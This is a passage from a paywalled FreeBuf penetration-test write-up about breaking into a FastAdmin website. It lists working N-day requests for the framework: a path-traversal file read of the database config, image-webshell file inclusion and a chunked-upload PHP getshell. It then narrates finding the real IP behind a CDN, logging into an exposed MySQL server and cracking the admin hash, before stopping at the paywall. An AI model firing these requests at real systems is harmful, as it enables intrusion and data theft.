freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

从任意文件读取到上线CS——绕过模块禁用
X1ly_S 2025-01-17 15:36:11 79014
所属地 四川省

前言

记录一次稍微有点崎岖的渗透实战,看我如果从任意文件读取,绕过模块禁用,到上线CS

渗透过程

信息收集

一顿信息收集后,终于找到了这样一个资产,熟悉的师傅可能一眼就看出来了,这是fastadmin,对!没错,当我看到这个fastadmin的时候,就有预感要出货了……

image-20250109161427660

先是试了一下弱口令,因为fastadmin中管理员忘记密码时,会去数据库中手动重置密码,默认重置的密码一般都是123456

尝试了admin 123456不行,接下来干嘛呢?

肯定不是按照常规的思路去测什么登录框SQL注入,js里的未授权接口等等,因为这个是一个fastadmin框架啊,这种肯定是直接打Nday最有效撒,于是我们去收集一下fastadmin都有哪些Nday?

image-20250109163325242

fastadmin Nday列举

下面简单列举一下几个Nday,不作详细解释,附上文章链接

任意文件读取

可以读取数据库配置信息,可用来连接数据库

GET /index/ajax/lang?lang=../../application/database HTTP/1.1

前台文件包含getshell

配合对应路径包含上传的图片马getshell

POST 图片马
GET /index/user/_empty?name=../../public/uploads/20250109/1623aab905a3669b383b80881e44107a.png

分片上传getshell

前提:chunking = true (开启分片上传功能)

//传入xx.php
POST /index/ajax/upload HTTP/1.1
Host: target

------WebKitFormBoundarybw5c2a2bqlLLOMEU
Content-Disposition: form-data; name="file"; filename="Xnip2021-04-02_11-05-27.png"
Content-Type: application/octet-stream

PNG
...
<?php phpinfo();?>
------WebKitFormBoundarybw5c2a2bqlLLOMEU
Content-Disposition: form-data; name="chunkid"

xx.php

------WebKitFormBoundarybw5c2a2bqlLLOMEU
Content-Disposition: form-data; name="chunkindex"

0
------WebKitFormBoundarybw5c2a2bqlLLOMEU

插件getshell

配合插件完成命令执行

任意文件读取

ok,在我们掌握了这些Nday的利用方式后,再回头看看这个站,逐一尝试一些Nday的poc,没有poc的就手动利用

试试任意文件读取,运气非常好直接读到了数据库配置信息,那么我们就有可能能够连上目标的数据库!

image-20250109165214488

拿下Mysql数据库

接下来就是去看数据库是否公网开放,开放在哪一个ip上

架设有CDN,使用海外多地ping找了一下真实ip,成功找到!

image-20250109165449492

那么去看看3306是否开放,ok,很顺畅,可以去试着连接数据库了,看看有无ip限制

image-20250109165648591

也是运气爆棚,Mysql数据库允许公网任意连接,轻松拿下Mysql数据库

image-20250109165855471

进入后台

拿到数据库了,我们首先去找管理员的密码

成功找到了,去MD5碰撞一下看看

可试读前30%内容
¥ 19.9 全文查看
9.9元开通FVIP会员
畅读付费文章
最低0.3元/天
# 渗透测试 # 内网渗透 # 攻防实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 X1ly_S 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
X1ly_S LV.3
需要的不是掌声,而是没有哭声
  • 12 文章数
  • 39 关注者
2024-长亭校招-安服经验浅谈
2024-12-25
万字长文窥探信息收集真正的艺术
2024-12-20
如何HOST碰撞挖掘隐蔽资产
2024-12-07
文章目录